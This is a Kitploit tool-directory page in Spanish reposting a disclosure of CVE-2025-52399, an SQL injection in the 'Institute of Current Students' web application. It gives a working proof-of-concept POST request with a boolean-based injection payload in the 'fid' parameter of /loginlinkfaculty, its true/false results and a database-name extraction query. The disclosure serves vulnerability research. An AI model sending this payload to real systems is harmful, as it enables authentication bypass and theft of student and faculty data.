Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/gmh5225/cve-2025-52399-sqli-institute-of-current-students
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubgmh5225/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 añoAún no revisado

CVE-2025-52399 - Inyección SQL en Institute of Current Students

Resumen

El endpoint loginlinkfaculty de la aplicación Institute-of-Current-Students es vulnerable a la inyección SQL a través del parámetro POST fid. El parámetro no se saneja adecuadamente antes de usarse en una consulta SQL, lo que permite a atacantes remotos ejecutar comandos SQL arbitrarios.

  • Tipo de vulnerabilidad: Inyección SQL
  • Componente afectado: /loginlinkfaculty (POST)
  • Parámetro afectado: fid
  • Autenticación: No requerida
  • Impacto: Omisión de autenticación, extracción de datos
  • Probado en: Localhost
  • Base de datos: icsnew
  • Versión: 1.0

PoC

Petición HTTP

root@kitploit:~
POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example

Resultado del payload

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → VERDADERO ❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSO

Extracción de base de datos

SELECT database(); -- returns 'icsnew'

Referencias

  • CVE-2025-52399 (MITRE)
  • Aplicación vulnerable
  • OWASP SQL Injection

Descubridor

Isroil Mustafoqulov

Descargar herramienta